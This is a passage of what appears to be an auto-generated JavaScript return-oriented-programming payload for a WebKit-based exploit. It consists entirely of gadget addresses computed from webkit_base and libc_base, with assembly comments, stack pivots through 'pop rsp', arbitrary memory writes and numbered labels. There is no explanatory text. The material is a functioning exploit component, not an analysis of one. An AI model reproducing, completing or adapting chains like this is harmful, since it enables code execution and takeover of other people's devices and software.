webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4874:
db([0, 0]); // 0x0
set_gadgets([
ropchain+262088, //L4874+24
ropchain+271584, //L4869
libc_base+764760, //pop rsi
ropchain+262128, //L4875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4875:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4877:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+262248, //L4880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+262232, //L4878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+262408, //L4884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+262376, //L4882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+262392, //L4883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4881:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4882:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4883:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4884:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+262464, //L4886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4886:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+262592, //L4888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+262608, //L4889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262576, //L4887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4887:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4888:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4889:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+262768, //L4893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+262736, //L4891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262752, //L4892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4890:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4892:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+262824, //L4895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4895:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+262952, //L4897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+262968, //L4898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262936, //L4896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4896:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4897:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4898:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263080, //L4900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+263128, //L4903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263096, //L4901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4900:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4901:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4902:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4903:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+263240, //L4904+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+263232, //L4904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4904:
db([0, 0]); // 0x0
set_gadgets([
ropchain+263256, //L4904+24
ropchain+265280, //L4899
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+263296, //L4905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4906:
db([45, 0]); // 0x2d
set_gadget(libc_base+144605,); //pop rdi
//L4907:
db([45, 0]); // 0x2d
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263488, //L4911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+263456, //L4909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263472, //L4910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4908:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4909:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4910:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4911:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+263544, //L4913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4913:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+263672, //L4915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+263688, //L4916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263656, //L4914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4914:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4915:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4916:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263784, //L4918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263768, //L4917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4917:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4918:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+263864, //L4919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4921:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+263984, //L4924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+263968, //L4922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4924:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+264128, //L4927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264096, //L4925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+264112, //L4926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4925:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4926:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+264200, //L4929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4929:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264256, //L4930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4930:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264336, //L4932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4932:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4934:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+264456, //L4937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264440, //L4935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+264600, //L4940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264568, //L4938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+264584, //L4939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4938:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4940:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264688, //L4942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4941:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4942:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+264744, //L4943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4943:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4945:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+264824, //L4947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4947:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+264928, //L4948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+264944, //L4949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4948:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+265032, //L4951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265088, //L4952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4952:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+265160, //L4955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4955:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265216, //L4956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+271584, //L4958
//L4899:
libc_base+764760, //pop rsi
ropchain+265320, //L4959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4959:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4961:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+265440, //L4964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+265424, //L4962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4962:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4964:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+265616, //L4967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+265632, //L4968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+265584, //L4965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+265600, //L4966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4965:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4966:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4967:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4968:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+265728, //L4970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+265712, //L4969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4969:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4970:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4971:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4972:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L4973:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+265928, //L4975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265984, //L4976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4976:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+266120, //L4980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+266104, //L4979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4978:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4980:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+266256, //L4983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+266288, //L4985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266240, //L4982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4982:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4983:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4985:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+266400, //L4986+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+266392, //L4986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4986:
db([0, 0]); // 0x0
set_gadgets([
ropchain+266416, //L4986+24
ropchain+268440, //L4981
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+266456, //L4987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4987:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4988:
db([43, 0]); // 0x2b
set_gadget(libc_base+144605,); //pop rdi
//L4989:
db([43, 0]); // 0x2b
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+266648, //L4993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+266616, //L4991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266632, //L4992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4990:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4991:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4992:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+266704, //L4995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4995:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+266832, //L4997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+266848, //L4998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266816, //L4996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4996:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4998:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+266944, //L5000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266928, //L4999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5000:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267024, //L5001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5001:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5003:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267144, //L5006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267128, //L5004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5004:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5006:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+267288, //L5009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267256, //L5007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+267272, //L5008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5007:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5008:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5009:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+267360, //L5011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5011:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267416, //L5012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5012:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267496, //L5014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5014:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5016:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267616, //L5019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267600, //L5017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5017:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5019:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+267760, //L5022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267728, //L5020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+267744, //L5021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5020:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5022:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267848, //L5024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5023:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L5024:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267904, //L5025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5025:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5027:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+267984, //L5029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5029:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+268088, //L5030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
